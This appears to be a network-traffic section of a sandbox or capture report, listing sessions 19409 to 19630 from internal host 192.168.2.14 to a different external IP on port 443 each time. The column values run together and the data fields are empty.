                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19409192.168.2.1457280220.58.77.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19410192.168.2.143939475.18.211.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19411192.168.2.1442464210.89.159.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19412192.168.2.1444030204.132.3.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19413192.168.2.1452144110.185.106.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19414192.168.2.1442670223.41.9.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19415192.168.2.14469504.245.90.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19416192.168.2.145333091.24.236.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19417192.168.2.144529290.46.129.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19418192.168.2.145165035.3.90.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19419192.168.2.1451006162.122.183.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19420192.168.2.144994414.157.4.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19421192.168.2.1448298216.44.150.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19422192.168.2.144180471.163.200.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19423192.168.2.1456312108.146.23.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19424192.168.2.146095470.151.106.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19425192.168.2.145412036.19.77.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19426192.168.2.1460516149.41.170.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19427192.168.2.144601469.45.90.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19428192.168.2.143382227.100.124.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19429192.168.2.144005498.142.130.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19430192.168.2.1441192118.255.97.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19431192.168.2.1455434133.159.126.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19432192.168.2.1453332212.159.129.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19433192.168.2.143709863.223.126.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19434192.168.2.145905834.242.169.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19435192.168.2.143533248.13.42.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19436192.168.2.144232812.51.79.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19437192.168.2.1459240113.180.232.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19438192.168.2.1455874199.123.31.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19439192.168.2.143911671.219.58.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19440192.168.2.1452806158.45.173.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19441192.168.2.143315813.12.0.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19442192.168.2.1440856178.201.132.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19443192.168.2.1450192101.250.84.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19444192.168.2.1447862111.123.212.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19445192.168.2.1450494208.210.213.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19446192.168.2.143934663.199.201.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19447192.168.2.143305692.161.152.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19448192.168.2.1437382146.12.188.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19449192.168.2.143595674.67.169.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19450192.168.2.1455414109.8.31.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19451192.168.2.145237491.40.153.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19452192.168.2.143552438.98.130.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19453192.168.2.1435560116.85.212.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19454192.168.2.144531293.186.45.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19455192.168.2.1459900163.98.33.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19456192.168.2.1448060114.50.203.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19457192.168.2.1436336131.89.228.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19458192.168.2.1450796143.36.30.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19459192.168.2.1453904106.99.164.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19460192.168.2.1445292155.191.233.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19461192.168.2.145989072.243.79.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19462192.168.2.144285847.28.35.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19463192.168.2.14471045.83.250.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19464192.168.2.144325473.158.57.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19465192.168.2.144422270.121.72.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19466192.168.2.1437978154.174.28.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19467192.168.2.1459892169.219.104.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19468192.168.2.1448672223.118.126.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19469192.168.2.1460370124.127.214.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19470192.168.2.1456816163.115.145.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19471192.168.2.143841287.201.58.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19472192.168.2.146085836.21.253.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19473192.168.2.1448336103.132.100.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19474192.168.2.144634620.255.150.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19475192.168.2.1447682146.110.237.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19476192.168.2.145959442.93.198.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19477192.168.2.144073442.221.114.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19478192.168.2.144369673.111.236.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19479192.168.2.1433898211.196.207.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19480192.168.2.145215069.107.79.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19481192.168.2.145388450.98.50.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19482192.168.2.145991820.216.160.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19483192.168.2.1439518155.115.152.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19484192.168.2.1441604177.217.70.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19485192.168.2.146057859.62.136.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19486192.168.2.1454138191.129.174.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19487192.168.2.1457288184.156.1.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19488192.168.2.1453116181.87.89.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19489192.168.2.1446694142.124.105.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19490192.168.2.1456122161.47.63.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19491192.168.2.1435084120.81.141.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19492192.168.2.1442800106.82.144.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19493192.168.2.1452814213.114.36.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19494192.168.2.1434692180.205.135.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19495192.168.2.144482427.202.132.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19496192.168.2.1433496192.192.212.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19497192.168.2.1433444188.101.249.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19498192.168.2.145918680.229.224.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19499192.168.2.145452260.195.206.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19500192.168.2.14544885.178.194.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19501192.168.2.1459300164.221.194.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19502192.168.2.1451682141.11.35.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19503192.168.2.1450954168.226.3.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19504192.168.2.1433696102.233.191.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19505192.168.2.145334068.168.110.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19506192.168.2.1454426147.137.11.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19507192.168.2.1438556126.2.85.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19508192.168.2.1437210128.141.166.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19509192.168.2.1445050204.106.13.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19510192.168.2.1438852133.109.182.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19511192.168.2.1460940137.18.89.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19512192.168.2.1444558182.124.49.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19513192.168.2.144907861.227.134.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19514192.168.2.143577620.122.195.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19515192.168.2.1433986141.198.216.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19516192.168.2.1435864136.68.36.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19517192.168.2.1441652126.202.113.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19518192.168.2.1455848200.140.50.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19519192.168.2.145402497.251.128.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19520192.168.2.1438638100.47.82.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19521192.168.2.1441128218.150.147.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19522192.168.2.1450292122.217.53.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19523192.168.2.1451568142.5.69.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19524192.168.2.1454412142.175.46.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19525192.168.2.1435932210.213.237.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19526192.168.2.1455126146.12.225.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19527192.168.2.143878843.213.68.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19528192.168.2.144656427.201.121.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19529192.168.2.1434102164.211.225.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19530192.168.2.144849636.54.124.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19531192.168.2.144059067.173.104.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19532192.168.2.145058458.215.101.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19533192.168.2.1443018129.233.162.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19534192.168.2.1439438131.60.89.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19535192.168.2.1447466128.158.197.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19536192.168.2.145286251.84.99.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19537192.168.2.1436744135.12.132.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19538192.168.2.1453516187.220.170.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19539192.168.2.1454342120.221.16.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19540192.168.2.1445076110.58.215.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19541192.168.2.1446668117.122.94.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19542192.168.2.1438886116.60.16.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19543192.168.2.145743859.31.171.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19544192.168.2.1443752166.164.92.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19545192.168.2.1437094190.138.7.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19546192.168.2.1437180168.102.171.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19547192.168.2.1442142114.194.183.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19548192.168.2.1455310101.89.179.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19549192.168.2.143681249.123.70.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19550192.168.2.1441986101.184.176.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19551192.168.2.1447484220.242.159.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19552192.168.2.1453384121.100.255.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19553192.168.2.1452392162.15.54.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19554192.168.2.145020639.184.105.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19555192.168.2.1460716203.100.92.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19556192.168.2.1459194201.74.121.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19557192.168.2.145079814.243.62.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19558192.168.2.14357528.150.182.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19559192.168.2.1440578125.119.40.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19560192.168.2.1446284192.238.42.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19561192.168.2.144123061.177.47.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19562192.168.2.1449356171.225.197.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19563192.168.2.1446142100.8.29.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19564192.168.2.145541886.75.175.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19565192.168.2.145872674.145.175.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19566192.168.2.1445812205.201.216.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19567192.168.2.1438116145.159.136.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19568192.168.2.145830473.14.251.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19569192.168.2.145608441.237.52.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19570192.168.2.1442488110.184.46.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19571192.168.2.14496442.67.240.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19572192.168.2.145592295.19.207.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19573192.168.2.1451980172.168.8.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19574192.168.2.1452610177.84.5.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19575192.168.2.144961612.67.52.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19576192.168.2.1453538105.198.32.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19577192.168.2.1448232186.36.52.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19578192.168.2.145478275.173.65.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19579192.168.2.1444678222.165.29.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19580192.168.2.144454250.170.169.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19581192.168.2.1436630124.63.61.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19582192.168.2.1434088130.216.50.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19583192.168.2.144159685.48.229.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19584192.168.2.1447474134.224.81.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19585192.168.2.1438620187.240.136.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19586192.168.2.1455958189.168.246.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19587192.168.2.144373413.72.116.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19588192.168.2.1437662223.198.44.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19589192.168.2.1451128159.108.65.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19590192.168.2.145732425.181.234.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19591192.168.2.14552562.95.181.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19592192.168.2.14599121.63.9.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19593192.168.2.143896246.134.48.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19594192.168.2.1446306187.155.136.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19595192.168.2.145401265.24.89.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19596192.168.2.14571541.31.222.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19597192.168.2.1434622212.210.43.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19598192.168.2.1446818123.88.41.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19599192.168.2.1457590205.230.87.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19600192.168.2.143771031.70.152.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19601192.168.2.14361724.17.254.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19602192.168.2.146006831.111.225.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19603192.168.2.145526464.62.42.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19604192.168.2.1447102187.31.38.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19605192.168.2.145419032.57.12.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19606192.168.2.1452176103.41.229.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19607192.168.2.1459412217.37.122.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19608192.168.2.1459200101.237.141.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19609192.168.2.146090094.197.1.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19610192.168.2.1453018149.29.137.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19611192.168.2.1441852117.33.43.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19612192.168.2.1455958125.206.84.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19613192.168.2.143336851.117.149.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19614192.168.2.144415071.205.174.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19615192.168.2.145220466.209.205.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19616192.168.2.1459250220.225.121.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19617192.168.2.1447412115.67.36.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19618192.168.2.145188070.16.163.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19619192.168.2.145522096.249.39.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19620192.168.2.1438832162.194.185.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19621192.168.2.1450086199.169.84.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19622192.168.2.144069471.149.83.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19623192.168.2.14506162.55.23.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19624192.168.2.14533069.33.63.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19625192.168.2.145066012.121.231.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19626192.168.2.1457260155.24.176.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19627192.168.2.143429860.10.87.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19628192.168.2.1459394131.38.242.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19629192.168.2.1437098190.214.220.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19630192.168.2.1435954167.243.157.212443
